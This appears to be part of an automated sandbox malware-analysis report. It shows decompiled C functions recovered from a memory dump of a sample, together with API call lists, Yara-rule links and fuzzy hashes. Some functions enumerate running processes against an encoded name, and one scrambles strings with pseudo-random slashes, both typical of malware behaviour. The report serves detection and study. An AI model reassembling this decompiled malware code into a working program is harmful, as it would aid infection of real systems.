				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0467853F(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04674F14(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E046711EE( &_v32, _t39);
					goto L13;
				}
			}












                                                          0x046736b1
                                                          0x046736be
                                                          0x046736c4
                                                          0x046736c5
                                                          0x046736c6
                                                          0x046736c7
                                                          0x046736c8
                                                          0x046736cc
                                                          0x046736d8
                                                          0x046736dc
                                                          0x04673764
                                                          0x04673764
                                                          0x04673767
                                                          0x04673769
                                                          0x04673771
                                                          0x04673771
                                                          0x04673777
                                                          0x0467377a
                                                          0x0467377a
                                                          0x04673777
                                                          0x04673785
                                                          0x04673785
                                                          0x046736ef
                                                          0x046736f1
                                                          0x046736f1
                                                          0x04673708
                                                          0x0467370c
                                                          0x0467370f
                                                          0x0467371a
                                                          0x04673721
                                                          0x04673721
                                                          0x0467372a
                                                          0x0467372e
                                                          0x0467373c
                                                          0x04673730
                                                          0x04673730
                                                          0x04673731
                                                          0x04673732
                                                          0x04673733
                                                          0x04673734
                                                          0x04673735
                                                          0x04673735
                                                          0x04673741
                                                          0x04673744
                                                          0x04673748
                                                          0x0467374a
                                                          0x0467374a
                                                          0x04673751
                                                          0x00000000
                                                          0x04673753
                                                          0x04673753
                                                          0x04673760
                                                          0x00000000
                                                          0x04673760

                                                          APIs
                                                          • CreateEventA.KERNEL32(0467D2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,046752AA,?,00000001,?), ref: 04673702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,046752AA,?,00000001,?,00000002,?,?,04675D5E,?), ref: 0467370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,046752AA,?,00000001,?,00000002,?,?,04675D5E,?), ref: 0467371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,046752AA,?,00000001,?,00000002,?,?,04675D5E,?), ref: 04673721
                                                            • Part of subcall function 0467A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,04673741,?,04673741,?,?,?,?,?,04673741,?), ref: 0467A520
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: dbc07b9c14dd79280fced565f96108a712568335477b0945a4f650ccaf5d0a84
                                                          • Instruction ID: 871477f953243c6201d9e4e2682b8ec34749a88a7cde2dcd40ecc8b1499eaa29
                                                          • Opcode Fuzzy Hash: dbc07b9c14dd79280fced565f96108a712568335477b0945a4f650ccaf5d0a84
                                                          • Instruction Fuzzy Hash: 9421A4B2900219ABDF10BFF888848AEB7B9EF54354B014429EE11E7300F735B985DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046717E5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E046717E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x467d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x467d250; // 0x8dd6c59d
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x467d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                          0x046717ed
                                                          0x046717f0
                                                          0x046717f6
                                                          0x0467180e
                                                          0x04671810
                                                          0x04671815
                                                          0x04671817
                                                          0x0467181a
                                                          0x0467181c
                                                          0x0467181f
                                                          0x04671821
                                                          0x04671821
                                                          0x04671823
                                                          0x0467182e
                                                          0x04671833
                                                          0x04671844
                                                          0x0467184c
                                                          0x04671851
                                                          0x04671854
                                                          0x04671857
                                                          0x04671859
                                                          0x0467185c
                                                          0x0467185f
                                                          0x0467185f
                                                          0x04671862
                                                          0x0467186d
                                                          0x04671872
                                                          0x0467187c

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04671C49,00000000,?,?,046720C2,?,04AF95B0), ref: 046717F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04671808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04671C49,00000000,?,?,046720C2,?,04AF95B0), ref: 0467184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 0467186D
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: e2b53783b449722cbf6a298b02008088a719ca01a723f89cf545b90b5169ddbf
                                                          • Instruction ID: 2ef0961e1eab17aa8b344270a5d004ad50a6d3c82b2f4d22ed710a064084bb0b
                                                          • Opcode Fuzzy Hash: e2b53783b449722cbf6a298b02008088a719ca01a723f89cf545b90b5169ddbf
                                                          • Instruction Fuzzy Hash: E1110672A00114AFD3148FA9DC84E9EBBBADF91260B1502BAF6049B240FB749E0487A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0467486F, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E0467486F(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E0467A71F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x467c284);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x467c284);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                          0x0467487a
                                                          0x0467487e
                                                          0x04674880
                                                          0x04674881
                                                          0x04674889
                                                          0x04674889
                                                          0x0467488d
                                                          0x00000000
                                                          0x00000000
                                                          0x04674884
                                                          0x04674885
                                                          0x04674888
                                                          0x04674888
                                                          0x04674895
                                                          0x0467489a
                                                          0x046748a0
                                                          0x046748a8
                                                          0x046748ae
                                                          0x046748b0
                                                          0x046748b5
                                                          0x046748b9
                                                          0x046748bb
                                                          0x046748be
                                                          0x046748c5
                                                          0x046748c5
                                                          0x046748cf
                                                          0x046748d2
                                                          0x046748d3
                                                          0x046748d5
                                                          0x046748e1
                                                          0x046748e1
                                                          0x046748ee

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,04AF95AC,?,04675D25,?,0467243F,04AF95AC,?,04675D25), ref: 04674889
                                                          • StrTrimA.SHLWAPI(?,0467C284,00000002,?,04675D25,?,0467243F,04AF95AC,?,04675D25), ref: 046748A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,04675D25,?,0467243F,04AF95AC,?,04675D25), ref: 046748B3
                                                          • StrTrimA.SHLWAPI(00000001,0467C284,?,04675D25,?,0467243F,04AF95AC,?,04675D25), ref: 046748C5
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: 15961b0688faaacccdc120e6432abf83f1d9c99d99a69cead533732942de893c
                                                          • Instruction ID: 3bd9d93ad9a739085f03381083dd6f7c473339793e2e14a6383aa7bc15638129
                                                          • Opcode Fuzzy Hash: 15961b0688faaacccdc120e6432abf83f1d9c99d99a69cead533732942de893c
                                                          • Instruction Fuzzy Hash: 0101B5716053659FD3219F659C4CE2BBBDCEF96A94F110618F941D7340FF64E80286A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0467A65C, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E0467A65C() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x467d2a8; // 0x47a5a8
						_t2 = _t9 + 0x467ee34; // 0x73617661
						_push( &_v264);
						if( *0x467d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                          0x0467a667
                                                          0x0467a671
                                                          0x0467a675
                                                          0x0467a67f
                                                          0x0467a6b0
                                                          0x0467a686
                                                          0x0467a68b
                                                          0x0467a698
                                                          0x0467a6a1
                                                          0x0467a6b8
                                                          0x0467a6a3
                                                          0x0467a6ab
                                                          0x00000000
                                                          0x0467a6ab
                                                          0x0467a6b9
                                                          0x0467a6ba
                                                          0x00000000
                                                          0x0467a6ba
                                                          0x00000000
                                                          0x0467a6b4
                                                          0x0467a6c0
                                                          0x0467a6c5

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0467A66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 0467A67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 0467A6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 0467A6BA
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: c8cdb520f290806d4e52887021464da8f13da2e134edbff3ecaa76e5db06093e
                                                          • Instruction ID: d57e48f6f9498c2b4ef396902f31d3d8c45d65c14eaa23ff9cf4510fa694e4b5
                                                          • Opcode Fuzzy Hash: c8cdb520f290806d4e52887021464da8f13da2e134edbff3ecaa76e5db06093e
                                                          • Instruction Fuzzy Hash: F3F05B36701114AAE721BAE69C89DDF776CDFC5715F010255F905D3200FE34EE4687A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04676840, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04676840(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                          0x0467684a
                                                          0x0467684e
                                                          0x04676863
                                                          0x04676865
                                                          0x0467686a
                                                          0x04676870
                                                          0x04676872
                                                          0x04676877
                                                          0x04676882
                                                          0x04676879
                                                          0x04676879
                                                          0x04676879
                                                          0x04676877
                                                          0x04676890

                                                          APIs
                                                          • memset.NTDLL ref: 0467684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 04676863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04676870
                                                          • CloseHandle.KERNEL32(?), ref: 04676882
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: d80eb3b0ef39f62762be4a34c8dcc9c36cb49c8f5ef80bd9992637c00e89f720
                                                          • Instruction ID: 996fc5b991e478e32d74ff0e9380c7a73d8bd679ce751afe9719cb471a9938bb
                                                          • Opcode Fuzzy Hash: d80eb3b0ef39f62762be4a34c8dcc9c36cb49c8f5ef80bd9992637c00e89f720
                                                          • Instruction Fuzzy Hash: 4CF089F110470C7FD3146F66DCC4C27BBACEB611ADB114A2DF14281511E676BC094B70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04671B42, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04671B42() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x467d26c; // 0x318
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x467d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x467d26c; // 0x318
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x467d238; // 0x4700000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                          0x04671b42
                                                          0x04671b49
                                                          0x04671b93
                                                          0x04671b95
                                                          0x04671b95
                                                          0x04671b4d
                                                          0x04671b53
                                                          0x04671b58
                                                          0x04671b5c
                                                          0x04671b62
                                                          0x04671b69
                                                          0x00000000
                                                          0x00000000
                                                          0x04671b6b
                                                          0x04671b70
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04671b70
                                                          0x04671b72
                                                          0x04671b7a
                                                          0x04671b7d
                                                          0x04671b7d
                                                          0x04671b83
                                                          0x04671b8a
                                                          0x04671b8d
                                                          0x04671b8d
                                                          0x00000000

                                                          APIs
                                                          • SetEvent.KERNEL32(00000318,00000001,04674F0E), ref: 04671B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04671B5C
                                                          • CloseHandle.KERNEL32(00000318), ref: 04671B7D
                                                          • HeapDestroy.KERNEL32(04700000), ref: 04671B8D
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 1ee34561949691b2a918c3ee0444f23da9babfb683c48dbbb882f06b9d34174c
                                                          • Instruction ID: 7ee4be96bfa9656d1e085284e1879d4ba8e5a46291aabcd8a9aff26bb9e6af04
                                                          • Opcode Fuzzy Hash: 1ee34561949691b2a918c3ee0444f23da9babfb683c48dbbb882f06b9d34174c
                                                          • Instruction Fuzzy Hash: DFF0A031A01301D7EB145B35E808E863B98EF26B607081611BA14E3390FB38EC4586A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046723F4, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E046723F4(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x467d32c; // 0x4af95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x467d32c; // 0x4af95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x467d030) {
					HeapFree( *0x467d238, 0, _t8);
				}
				_t14[1] = E0467486F(_v0, _t14);
				_t11 =  *0x467d32c; // 0x4af95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                          0x046723f4
                                                          0x046723f4
                                                          0x046723fd
                                                          0x0467240d
                                                          0x0467240d
                                                          0x04672412
                                                          0x04672417
                                                          0x00000000
                                                          0x00000000
                                                          0x04672407
                                                          0x04672407
                                                          0x04672419
                                                          0x0467241d
                                                          0x0467242f
                                                          0x0467242f
                                                          0x0467243f
                                                          0x04672442
                                                          0x04672447
                                                          0x0467244b
                                                          0x04672451

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(04AF9570), ref: 046723FD
                                                          • Sleep.KERNEL32(0000000A,?,04675D25), ref: 04672407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04675D25), ref: 0467242F
                                                          • RtlLeaveCriticalSection.NTDLL(04AF9570), ref: 0467244B
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 1e46f3796714266b24271d271a66d059f82c584bd0cf3562d55369a3d52fa8d6
                                                          • Instruction ID: 3c833f3362147a64a4b8718e316a01777227e33c4a78f67c4cafa4e2976d63e4
                                                          • Opcode Fuzzy Hash: 1e46f3796714266b24271d271a66d059f82c584bd0cf3562d55369a3d52fa8d6
                                                          • Instruction Fuzzy Hash: F7F0F8706402409BE728DF78E958F1A77E4EF29744B049844F645D6255F728FC41CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04676702, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E04676702() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x467d32c; // 0x4af95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x467d32c; // 0x4af95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x467d32c; // 0x4af95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x467e81a) {
					HeapFree( *0x467d238, 0, _t10);
					_t7 =  *0x467d32c; // 0x4af95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                          0x04676702
                                                          0x0467670b
                                                          0x0467671b
                                                          0x0467671b
                                                          0x04676720
                                                          0x04676725
                                                          0x00000000
                                                          0x00000000
                                                          0x04676715
                                                          0x04676715
                                                          0x04676727
                                                          0x0467672c
                                                          0x04676730
                                                          0x04676743
                                                          0x04676749
                                                          0x04676749
                                                          0x04676752
                                                          0x04676754
                                                          0x04676758
                                                          0x0467675e

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(04AF9570), ref: 0467670B
                                                          • Sleep.KERNEL32(0000000A,?,04675D25), ref: 04676715
                                                          • HeapFree.KERNEL32(00000000,?,?,04675D25), ref: 04676743
                                                          • RtlLeaveCriticalSection.NTDLL(04AF9570), ref: 04676758
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 8aa4a01340be9a7cdcc0efbc7fd76ed8c541d4ee4a25689f91352f241c5b9094
                                                          • Instruction ID: a7639f385cae44cb9949fb23ce56c45e3550c98d66aee9e3f01852d7c108952e
                                                          • Opcode Fuzzy Hash: 8aa4a01340be9a7cdcc0efbc7fd76ed8c541d4ee4a25689f91352f241c5b9094
                                                          • Instruction Fuzzy Hash: D0F0B2746001009BE71CCF64D999F1577E5EF59764B04A409E906DB360F679BC00CA50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04675AF1, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E04675AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E0467A71F(_t2);
				if(_t34 != 0) {
					_t30 = E0467A71F(_t28);
					if(_t30 == 0) {
						E0467A734(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0467A782(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0467A782(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                          0x04675af1
                                                          0x04675afb
                                                          0x04675afd
                                                          0x04675b03
                                                          0x04675b03
                                                          0x04675b0c
                                                          0x04675b10
                                                          0x04675b1c
                                                          0x04675b20
                                                          0x04675b94
                                                          0x04675b22
                                                          0x04675b22
                                                          0x04675b26
                                                          0x04675b2b
                                                          0x04675b30
                                                          0x04675b4a
                                                          0x04675b39
                                                          0x04675b39
                                                          0x04675b3d
                                                          0x04675b40
                                                          0x04675b45
                                                          0x04675b45
                                                          0x04675b4f
                                                          0x04675b77
                                                          0x04675b7d
                                                          0x04675b80
                                                          0x04675b51
                                                          0x04675b53
                                                          0x04675b5b
                                                          0x04675b66
                                                          0x04675b6b
                                                          0x04675b6b
                                                          0x04675b87
                                                          0x04675b8e
                                                          0x04675b8f
                                                          0x04675b8f
                                                          0x04675b20
                                                          0x04675b9f

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04673E08,?,?,?,?,00000102,046767B8,?,?,00000000), ref: 04675AFD
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                            • Part of subcall function 0467A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04675B2B,00000000,00000001,00000001,?,?,04673E08,?,?,?,?,00000102), ref: 0467A790
                                                            • Part of subcall function 0467A782: StrChrA.SHLWAPI(?,0000003F,?,?,04673E08,?,?,?,?,00000102,046767B8,?,?,00000000,00000000), ref: 0467A79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04673E08,?,?,?,?,00000102,046767B8,?), ref: 04675B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04675B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04675B77
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: 7e40cb94870d110d0fb824e8625a6608d50fba0c28fe9f2eb3e7a3fa01f73996
                                                          • Instruction ID: 2d447263aa284ad868fc96f47b97bcce14ff140f08ef5c0d6c4a9f119bff15ce
                                                          • Opcode Fuzzy Hash: 7e40cb94870d110d0fb824e8625a6608d50fba0c28fe9f2eb3e7a3fa01f73996
                                                          • Instruction Fuzzy Hash: 2721DF76504219FFDB126FB4CC54AAEBFB9EF16694B044098F9069F200FB35E90187E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046745C6, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E046745C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E0467A71F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                          0x046745db
                                                          0x046745df
                                                          0x046745e9
                                                          0x046745ee
                                                          0x046745f3
                                                          0x046745f5
                                                          0x046745fd
                                                          0x04674602
                                                          0x04674610
                                                          0x04674615
                                                          0x0467461f

                                                          APIs
